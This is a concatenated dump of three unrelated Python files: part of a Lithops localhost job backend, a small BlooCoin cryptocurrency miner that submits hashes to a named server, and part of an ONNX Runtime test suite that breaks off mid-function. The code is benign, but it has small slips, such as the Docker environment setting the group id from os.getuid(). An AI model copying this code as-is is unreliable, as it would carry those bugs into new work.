self.should_run = True
msg = COMPUTE_CLI_MSG.format('Localhost compute')
logger.info("{}".format(msg))
def init(self):
"""
Init tasks for localhost
"""
pass
def start_manager(self):
"""
Starts manager thread to keep order in tasks
"""
def job_manager():
logger.debug('Staring localhost job manager')
self.should_run = True
while self.should_run:
job_payload, job_filename = self.job_queue.get()
if job_payload is None and job_filename is None:
break
executor_id = job_payload['executor_id']
job_id = job_payload['job_id']
runtime_name = job_payload['runtime_name']
env = self.get_env(runtime_name)
process = env.run(job_payload, job_filename)
process.communicate() # blocks until the process finishes
logger.debug(f'ExecutorID {executor_id} | JobID {job_id} - Execution finished')
if self.job_queue.empty():
break
self.job_manager = None
logger.debug("Localhost job manager stopped")
if not self.job_manager:
self.job_manager = threading.Thread(target=job_manager)
self.job_manager.start()
def _get_env_type(self, runtime_name):
"""
Gets the environment type based on the runtime name
"""
return 'default' if '/' not in runtime_name else 'docker'
def get_env(self, runtime_name):
"""
Generates the proper runtime environment based on the runtime name
"""
if runtime_name not in self.env:
if '/' not in runtime_name:
env = DefaultEnv()
else:
pull_runtime = self.config.get('pull_runtime', False)
env = DockerEnv(runtime_name, pull_runtime)
env.setup()
self.env[runtime_name] = env
return self.env[runtime_name]
def deploy_runtime(self, runtime_name, *args):
"""
Extract the runtime metadata and preinstalled modules
"""
logger.info(f"Extracting preinstalled Python modules from {runtime_name}")
env = self.get_env(runtime_name)
runtime_metadata = env.preinstalls()
return runtime_metadata
def invoke(self, job_payload):
"""
Run the job description against the selected environment
"""
executor_id = job_payload['executor_id']
job_id = job_payload['job_id']
runtime_name = job_payload['runtime_name']
logger.debug(f'ExecutorID {executor_id} | JobID {job_id} - Putting job into localhost queue')
self.start_manager()
env = self.get_env(runtime_name)
job_filename = env._prepare_job_file(job_payload)
self.job_queue.put((job_payload, job_filename))
def get_runtime_key(self, runtime_name, *args):
"""
Generate the runtime key that identifies the runtime
"""
env_type = self._get_env_type(runtime_name)
runtime_key = os.path.join('localhost', env_type, runtime_name.strip("/"))
return runtime_key
def get_backend_type(self):
"""
Wrapper method that returns the type of the backend (Batch or FaaS)
"""
return 'batch'
def clean(self, **kwargs):
"""
Deletes all local runtimes
"""
pass
def clear(self, job_keys=None):
"""
Kills all running jobs processes
"""
self.should_run = False
while not self.job_queue.empty():
try:
self.job_queue.get(False)
except Exception:
pass
for runtime_name in self.env:
self.env[runtime_name].stop(job_keys)
if self.job_manager:
self.job_queue.put((None, None))
self.should_run = True
class BaseEnv():
"""
Base environment class for shared methods
"""
def __init__(self, runtime):
self.runtime = runtime
self.jobs = {} # dict to store executed jobs (job_keys) and PIDs
def _copy_lithops_to_tmp(self):
if is_lithops_worker() and os.path.isfile(RUNNER):
return
os.makedirs(LITHOPS_TEMP_DIR, exist_ok=True)
try:
shutil.rmtree(os.path.join(LITHOPS_TEMP_DIR, 'lithops'))
except FileNotFoundError:
pass
shutil.copytree(LITHOPS_LOCATION, os.path.join(LITHOPS_TEMP_DIR, 'lithops'))
src_handler = os.path.join(LITHOPS_LOCATION, 'localhost', 'runner.py')
copyfile(src_handler, RUNNER)
def _prepare_job_file(self, job_payload):
"""
Creates the job file that contains the job payload to be executed
"""
job_key = job_payload['job_key']
storage_bucket = job_payload['config']['lithops']['storage_bucket']
local_job_dir = os.path.join(LITHOPS_TEMP_DIR, storage_bucket, JOBS_PREFIX)
docker_job_dir = f'/tmp/lithops/{storage_bucket}/{JOBS_PREFIX}'
job_file = f'{job_key}-job.json'
os.makedirs(local_job_dir, exist_ok=True)
local_job_filename = os.path.join(local_job_dir, job_file)
with open(local_job_filename, 'w') as jl:
json.dump(job_payload, jl, default=str)
if isinstance(self, DockerEnv):
job_filename = '{}/{}'.format(docker_job_dir, job_file)
else:
job_filename = local_job_filename
return job_filename
def stop(self, job_keys=None):
"""
Stops running processes
"""
def kill_job(job_key):
if self.jobs[job_key].poll() is None:
logger.debug(f'Killing job {job_key} with PID {self.jobs[job_key].pid}')
PID = self.jobs[job_key].pid
if is_unix_system():
PGID = os.getpgid(PID)
os.killpg(PGID, signal.SIGKILL)
else:
os.kill(PID, signal.SIGTERM)
del self.jobs[job_key]
to_delete = job_keys or list(self.jobs.keys())
for job_key in to_delete:
try:
if job_key in self.jobs:
kill_job(job_key)
except Exception:
pass
class DockerEnv(BaseEnv):
"""
Docker environment uses a docker runtime image
"""
def __init__(self, docker_image, pull_runtime):
logger.debug(f'Starting Docker Environment for {docker_image}')
super().__init__(runtime=docker_image)
self.pull_runtime = pull_runtime
self.uid = os.getuid() if is_unix_system() else None
self.gid = os.getuid() if is_unix_system() else None
def setup(self):
logger.debug('Setting up Docker environment')
self._copy_lithops_to_tmp()
if self.pull_runtime:
logger.debug('Pulling Docker runtime {}'.format(self.runtime))
sp.run(shlex.split(f'docker pull {self.runtime}'), check=True,
stdout=sp.PIPE, universal_newlines=True)
def preinstalls(self):
if not os.path.isfile(RUNNER):
self.setup()
tmp_path = Path(TEMP).as_posix()
cmd = 'docker run '
cmd += f'--user {self.uid}:{self.gid} ' if is_unix_system() else ''
cmd += f'--rm -v {tmp_path}:/tmp --entrypoint "python3" {self.runtime} /tmp/lithops/runner.py preinstalls'
process = sp.run(shlex.split(cmd), check=True, stdout=sp.PIPE,
universal_newlines=True, start_new_session=True)
runtime_meta = json.loads(process.stdout.strip())
return runtime_meta
def run(self, job_payload, job_filename):
"""
Runs a job
"""
executor_id = job_payload['executor_id']
job_id = job_payload['job_id']
total_calls = len(job_payload['call_ids'])
job_key = job_payload['job_key']
logger.debug(f'ExecutorID {executor_id} | JobID {job_id} - Running '
f'{total_calls} activations in the localhost worker')
if not os.path.isfile(RUNNER):
self.setup()
tmp_path = Path(TEMP).as_posix()
cmd = f'docker run --name lithops_{job_key} '
cmd += f'--user {self.uid}:{self.gid} ' if is_unix_system() else ''
cmd += f'--rm -v {tmp_path}:/tmp --entrypoint "python3" {self.runtime} /tmp/lithops/runner.py run {job_filename}'
log = open(RN_LOG_FILE, 'a')
process = sp.Popen(shlex.split(cmd), stdout=log, stderr=log, start_new_session=True)
self.jobs[job_key] = process
return process
def stop(self, job_keys=None):
"""
Stops running containers
"""
if job_keys:
for job_key in job_keys:
sp.Popen(shlex.split(f'docker rm -f lithops_{job_key}'),
stdout=sp.DEVNULL, stderr=sp.DEVNULL)
else:
for job_key in self.jobs:
sp.Popen(shlex.split(f'docker rm -f lithops_{job_key}'),
stdout=sp.DEVNULL, stderr=sp.DEVNULL)
super().stop(job_keys)
class DefaultEnv(BaseEnv):
"""
Default environment uses current python3 installation
"""
def __init__(self):
logger.debug(f'Starting Default Environment for {sys.executable}')
super().__init__(runtime=sys.executable)
def setup(self):
logger.debug('Setting up Default environment')
self._copy_lithops_to_tmp()
def preinstalls(self):
if not os.path.isfile(RUNNER):
self.setup()
cmd = [self.runtime, RUNNER, 'preinstalls']
process = sp.run(cmd, check=True, stdout=sp.PIPE, universal_newlines=True,
start_new_session=True)
runtime_meta = json.loads(process.stdout.strip())
return runtime_meta
def run(self, job_payload, job_filename):
"""
Runs a job
"""
executor_id = job_payload['executor_id']
job_id = job_payload['job_id']
total_calls = len(job_payload['call_ids'])
job_key = job_payload['job_key']
logger.debug(f'ExecutorID {executor_id} | JobID {job_id} - Running '
f'{total_calls} activations in the localhost worker')
if not os.path.isfile(RUNNER):
self.setup()
cmd = [self.runtime, RUNNER, 'run', job_filename]
log = open(RN_LOG_FILE, 'a')
process = sp.Popen(cmd, stdout=log, stderr=log, start_new_session=True)
self.jobs[job_key] = process
return process
|
blc_hash.py | #!/usr/bin/env python
import sys
import threading
import Queue
import random
import time
import string
import hashlib
import argparse
import socket
import json
###
thread_list = []
charmap = string.lowercase + string.uppercase + string.digits
wait_to_send = [] # Stuff we've queued but can't send for various reasons.
###
parser = argparse.ArgumentParser(
description="Mine your way to riches and glory with BlooCoins. (Maybe)"
)
parser.add_argument(
"-t", "--threads",
help="The amount of worker threads",
type=int,
default=5
)
parser.add_argument(
"-q", "--queue",
help="The queue size to work through",
type=int,
default=50
)
parser.add_argument(
"-u", "--upper-bound",
help="The upper bound at which we abandon the job (default: %(default)s)",
type=int,
default=1.5*(10**6)
)
parser.add_argument(
"-d", "--difficulty",
help="The difficulty as reported by the server",
type=int,
default=7
)
parser.add_argument(
"-a", "--address",
help="An address to send valid hashes to at a BLC server",
type=str,
default=None
)
parser.add_argument(
"--server",
help=("The BLC server we're sending to."
" ADDRESS[:PORT] (default: %(default)s)"),
type=str,
default="bloocoin.zapto.org"
)
parser.add_argument(
"--debug",
help="Spam the terminal with debugging text.",
action="store_true"
)
args = parser.parse_args()
start_time = time.time()
def start_string():
return "".join([random.choice(charmap) for _ in xrange(0, 5)])
def send_work(work, num, work_hash):
data = {
"cmd": "check",
"winning_string": work + str(num),
"winning_hash": work_hash,
"addr": args.address
}
wait_to_send.append(data)
if args.debug:
sys.stdout.write("send_work(): " + str(data) + "\n")
sys.stdout.flush()
server = {
"addr": args.server.split(':')[0],
"port": 3122
}
if len(args.server.split(':')) > 1:
try:
server['port'] = int(args.server.split(':')[1])
except TypeError as e:
# Give me an integer you wanker!
if args.debug:
sys.stdout.write(e + "\n")
sys.stdout.flush()
if args.debug:
sys.stdout.write("about to enumerate, brotha; {0}:{1}\n".format(
server['addr'], server['port']
)
)
sys.stdout.flush()
# We're looping just incase something screws up,
# so we don't lose all our hard work.
for i, w in enumerate(wait_to_send):
if args.debug:
sys.stdout.write(str(i) + str(w) + "\n")
sys.stdout.flush()
# Apparently we can't reuse sockets after we
# s.close(), so we have to make one each loop. :(
s = socket.socket()
try:
s.connect((server['addr'], server['port']))
except IOError as e:
# NOPE NOPE NOPE NOPE NOPE BAIL
if args.debug:
sys.stdout.write(e)
sys.stdout.flush()
continue
s.send(json.dumps(w))
ret = s.recv(1024)
if ret.strip() == "True": # Seriously wtf max?
# Success, do a little dance, I dunno.
pass
if args.debug:
sys.stdout.write("got back: " + ret + "\n")
sys.stdout.flush()
# Sent so we'll just remove it from the list.
wait_to_send.pop(i)
s.close()
q = Queue.Queue()
def worker():
difficulty = args.difficulty
num = 0
buf = "0" * difficulty
while True:
work = q.get()
num = 0
sys.stdout.write("[{0}] started work".format(work) + "\n")
sys.stdout.flush()
# Layered while loops, because... fuck it.
while True:
work_hash = hashlib.sha512(work + str(num)).hexdigest()
if work_hash[0:difficulty] == buf:
with open(work + str(num) + '.blc', 'w') as f:
f.write(work_hash)
sys.stdout.write(
"[{0}] Hit the jackpot! // {0}{1} -> {2}".format(
work, num, work_hash
) + "\n"
)
sys.stdout.flush()
if args.address:
send_work(work, num, work_hash)
break
num += 1
if num >= args.upper_bound:
if args.debug:
sys.stdout.write(
"[{0}] hit upper bound: {1}".format(work, num) + "\n"
)
sys.stdout.write("[{0}] no success".format(work) + "\n")
sys.stdout.flush()
break
q.task_done()
for i in range(args.threads):
t = threading.Thread(target=worker)
thread_list.append(t)
t.daemon = True
t.start()
for i in range(0, args.queue):
q.put(start_string())
q.join()
finish_time = time.time()
print "Finished in:", finish_time - start_time, "-", "TADA!"
|
onnxruntime_test_python.py | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# -*- coding: UTF-8 -*-
import unittest
import os
import numpy as np
import onnxruntime as onnxrt
import threading
import sys
from helper import get_name
from onnxruntime.capi.onnxruntime_pybind11_state import Fail
class TestInferenceSession(unittest.TestCase):
def run_model(self, session_object, run_options):
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = session_object.get_inputs()[0].name
res = session_object.run([], {input_name: x}, run_options=run_options)
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testModelSerialization(self):
try:
so = onnxrt.SessionOptions()
so.log_verbosity_level = 1
so.logid = "TestModelSerialization"
so.optimized_model_filepath = "./PythonApiTestOptimizedModel.onnx"
onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so)
self.assertTrue(os.path.isfile(so.optimized_model_filepath))
except Fail as onnxruntime_error:
if str(onnxruntime_error) == "[ONNXRuntimeError] : 1 : FAIL : Unable to serialize model as it contains" \
" compiled nodes. Please disable any execution providers which generate compiled nodes.":
pass
else:
raise onnxruntime_error
def testGetProviders(self):
self.assertTrue('CPUExecutionProvider' in onnxrt.get_available_providers())
# get_all_providers() returns the default EP order from highest to lowest.
# CPUExecutionProvider should always be last.
self.assertTrue('CPUExecutionProvider' == onnxrt.get_all_providers()[-1])
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
self.assertTrue('CPUExecutionProvider' in sess.get_providers())
def testEnablingAndDisablingTelemetry(self):
onnxrt.disable_telemetry_events()
# no-op on non-Windows builds
# may be no-op on certain Windows builds based on build configuration
onnxrt.enable_telemetry_events()
def testSetProviders(self):
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
# confirm that CUDA Provider is in list of registered providers.
self.assertTrue('CUDAExecutionProvider' in sess.get_providers())
# reset the session and register only CPU Provider.
sess.set_providers(['CPUExecutionProvider'])
# confirm only CPU Provider is registered now.
self.assertEqual(['CPUExecutionProvider'], sess.get_providers())
def testSetProvidersWithOptions(self):
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
import sys
import ctypes
CUDA_SUCCESS = 0
def runBaseTest1():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
self.assertTrue('CUDAExecutionProvider' in sess.get_providers())
option1 = {'device_id': 0}
sess.set_providers(['CUDAExecutionProvider'], [option1])
self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
option2 = {'device_id': -1}
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option2])
sess.set_providers(['CUDAExecutionProvider', 'CPUExecutionProvider'], [option1, {}])
self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
def runBaseTest2():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
self.assertIn('CUDAExecutionProvider', sess.get_providers())
# test get/set of "gpu_mem_limit" configuration.
options = sess.get_provider_options()
self.assertIn('CUDAExecutionProvider', options)
option = options['CUDAExecutionProvider']
self.assertIn('gpu_mem_limit', option)
ori_mem_limit = option['gpu_mem_limit']
new_mem_limit = int(ori_mem_limit) // 2
option['gpu_mem_limit'] = new_mem_limit
sess.set_providers(['CUDAExecutionProvider'], [option])
options = sess.get_provider_options()
self.assertEqual(options['CUDAExecutionProvider']['gpu_mem_limit'], str(new_mem_limit))
option['gpu_mem_limit'] = ori_mem_limit
sess.set_providers(['CUDAExecutionProvider'], [option])
options = sess.get_provider_options()
self.assertEqual(options['CUDAExecutionProvider']['gpu_mem_limit'], ori_mem_limit)
def test_get_and_set_option_with_values(option_name, option_values):
provider_options = sess.get_provider_options()
self.assertIn('CUDAExecutionProvider', provider_options)
cuda_options = options['CUDAExecutionProvider']
self.assertIn(option_name, cuda_options)
for option_value in option_values:
cuda_options[option_name] = option_value
sess.set_providers(['CUDAExecutionProvider'], [cuda_options])
new_provider_options = sess.get_provider_options()
self.assertEqual(
new_provider_options.get('CUDAExecutionProvider', {}).get(option_name),
str(option_value))
test_get_and_set_option_with_values(
'arena_extend_strategy', ['kNextPowerOfTwo', 'kSameAsRequested'])
test_get_and_set_option_with_values(
'cudnn_conv_algo_search', ["DEFAULT", "EXHAUSTIVE", "HEURISTIC"])
test_get_and_set_option_with_values(
'do_copy_in_default_stream', [0, 1])
option['gpu_external_alloc'] = '0'
option['gpu_external_free'] = '0'
sess.set_providers(['CUDAExecutionProvider'], [option])
options = sess.get_provider_options()
self.assertEqual(options['CUDAExecutionProvider']['gpu_external_alloc'], '0')
self.assertEqual(options['CUDAExecutionProvider']['gpu_external_free'], '0')
#
# Note: Tests that throw an exception leave an empty session due to how set_providers currently works,
# so run them last. Each set_providers call will attempt to re-create a session, so it's
# fine for a test that fails to run immediately after another one that fails.
# Alternatively a valid call to set_providers could be used to recreate the underlying session
# after a failed call.
#
option['arena_extend_strategy'] = 'wrong_value'
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
option['gpu_mem_limit'] = -1024
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
option['gpu_mem_limit'] = 1024.1024
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
option['gpu_mem_limit'] = 'wrong_value'
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
def getCudaDeviceCount():
import ctypes
num_device = ctypes.c_int()
result = ctypes.c_int()
error_str = ctypes.c_char_p()
result = cuda.cuInit(0)
result = cuda.cuDeviceGetCount(ctypes.byref(num_device))
if result != CUDA_SUCCESS:
cuda.cuGetErrorString(result, ctypes.byref(error_str))
print("cuDeviceGetCount failed with error code %d: %s" % (result, error_str.value.decode()))
return -1
return num_device.value
def setDeviceIdTest(i):
import ctypes
import onnxruntime as onnxrt
device = ctypes.c_int()
result = ctypes.c_int()
error_str = ctypes.c_char_p()
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
option = {'device_id': i}
sess.set_providers(['CUDAExecutionProvider'], [option])
self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
result = cuda.cuCtxGetDevice(ctypes.byref(device))
if result != CUDA_SUCCESS:
cuda.cuGetErrorString(result, ctypes.byref(error_str))
print("cuCtxGetDevice failed with error code %d: %s" % (result, error_str.value.decode()))
self.assertEqual(result, CUDA_SUCCESS)
self.assertEqual(i, device.value)
def runAdvancedTest():
num_device = getCudaDeviceCount()
if num_device < 0:
return
# Configure session to be ready to run on all available cuda devices
for i in range(num_device):
setDeviceIdTest(i)
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
# configure session with invalid option values and that should fail
with self.assertRaises(RuntimeError):
option = {'device_id': num_device}
sess.set_providers(['CUDAExecutionProvider'], [option])
option = {'device_id': 'invalid_value'}
sess.set_providers(['CUDAExecutionProvider'], [option])
# configure session with invalid option should fail
with self.assertRaises(RuntimeError):
option = {'invalid_option': 123}
sess.set_providers(['CUDAExecutionProvider'], [option])
libnames = ('libcuda.so', 'libcuda.dylib', 'cuda.dll')
for libname in libnames:
try:
cuda = ctypes.CDLL(libname)
runBaseTest1()
runBaseTest2()
runAdvancedTest()
except OSError:
continue
else:
break
else:
runBaseTest1()
runBaseTest2()
# raise OSError("could not load any of: " + ' '.join(libnames))
def testInvalidSetProviders(self):
with self.assertRaises(RuntimeError) as context:
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
sess.set_providers(['InvalidProvider'])
self.assertTrue('Unknown Provider Type: InvalidProvider' in str(context.exception))
def testSessionProviders(self):
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
# create session from scratch, but constrain it to only use the CPU.
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=['CPUExecutionProvider'])
self.assertEqual(['CPUExecutionProvider'], sess.get_providers())
def testRunModel(self):
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 2])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModelFromBytes(self):
with open(get_name("mul_1.onnx"), "rb") as f:
content = f.read()
sess = onnxrt.InferenceSession(content)
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 2])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModel2(self):
sess = onnxrt.InferenceSession(get_name("matmul_1.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModel2Contiguous(self):
sess = onnxrt.InferenceSession(get_name("matmul_1.onnx"))
x = np.array([[2.0, 1.0], [4.0, 3.0], [6.0, 5.0]], dtype=np.float32)[:, [1, 0]]
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
xcontiguous = np.ascontiguousarray(x)
rescontiguous = sess.run([output_name], {input_name: xcontiguous})
np.testing.assert_allclose(output_expected, rescontiguous[0], rtol=1e-05, atol=1e-08)
def testRunModelMultipleThreads(self):
available_providers = onnxrt.get_available_providers()
# Skip this test for a "pure" DML onnxruntime python wheel. We keep this test enabled for instances where both DML and CUDA
# EPs are available (Windows GPU CI pipeline has this config) - this test will pass because CUDA has higher precendence than DML
# and the nodes are assigned to only the CUDA EP (which supports this test)
if ('DmlExecutionProvider' in available_providers and not 'CUDAExecutionProvider' in available_providers):
print("Skipping testRunModelMultipleThreads as the DML EP does not support calling Run() on different threads using the same session object ")
else:
so = onnxrt.SessionOptions()
so.log_verbosity_level = 1
so.logid = "MultiThreadsTest"
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so)
ro1 = onnxrt.RunOptions()
ro1.logid = "thread1"
t1 = threading.Thread(target=self.run_model, args=(sess, ro1))
ro2 = onnxrt.RunOptions()
ro2.logid = "thread2"
t2 = threading.Thread(target=self.run_model, args=(sess, ro2))
t1.start()
t2.start()
t1.join()
t2.join()
def testListAsInput(self):
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
res = sess.run([], {input_name: x.tolist()})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testStringListAsInput(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array(['this', 'is', 'identity', 'test'], dtype=str).reshape((2, 2))
x_name = sess.get_inputs()[0].name
res = sess.run([], {x_name: x.tolist()})
np.testing.assert_equal(x, res[0])
def testRunDevice(self):
device = onnxrt.get_device()
self.assertTrue('CPU' in device or 'GPU' in device)
def testRunModelSymbolicInput(self):
sess = onnxrt.InferenceSession(get_name("matmul_2.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
# Input X has an unknown dimension.
self.assertEqual(input_shape, ['None', 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
# Output X has an unknown dimension.
self.assertEqual(output_shape, ['None', 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testBooleanInputs(self):
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"))
a = np.array([[True, True], [False, False]], dtype=bool)
b = np.array([[True, False], [True, False]], dtype=bool)
# input1:0 is first in the protobuf, and input:0 is second
# and we maintain the original order.
a_name = sess.get_inputs()[0].name
self.assertEqual(a_name, "input1:0")
a_shape = sess.get_inputs()[0].shape
self.assertEqual(a_shape, [2, 2])
a_type = sess.get_inputs()[0].type
self.assertEqual(a_type, 'tensor(bool)')
b_name = sess.get_inputs()[1].name
self.assertEqual(b_name, "input:0")
b_shape = sess.get_inputs()[1].shape
self.assertEqual(b_shape, [2, 2])
b_type = sess.get_inputs()[0].type
self.assertEqual(b_type, 'tensor(bool)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(bool)')
output_expected = np.array([[True, False], [False, False]], dtype=bool)
res = sess.run([output_name], {a_name: a, b_name: b})
np.testing.assert_equal(output_expected, res[0])
def testStringInput1(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array(['this', 'is', 'identity', 'test'], dtype=str).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testStringInput2(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array(['Olá', '你好', '여보세요', 'hello'], dtype=str).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testInputBytes(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array([b'this', b'is', b'identity', b'test']).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0].astype('|S8'))
def testInputObject(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array(['this', 'is', 'identity', 'test'], object).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testInputVoid(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
# numpy 1.20+ doesn't automatically pad the bytes based entries in the array when dtype is np.void,
# so we use inputs where that is the case
x = np.array([b'must', b'have', b'same', b'size'], dtype=np.void).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
expr = np.array([['must', 'have'], ['same', 'size']], dtype=object)
np.testing.assert_equal(expr, res[0])
def testRaiseWrongNumInputs(self):
with self.assertRaises(ValueError) as context:
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"))
a = np.array([[True, True], [False, False]], dtype=bool)
res = sess.run([], {'input:0': a})
self.assertTrue('Model requires 2 inputs' in str(context.exception))
def testModelMeta(self):
model_path = "../models/opset8/test_squeezenet/model.onnx"
if not os.path.exists(model_path):
return
sess = onnxrt.InferenceSession(model_path)
modelmeta = sess.get_modelmeta()
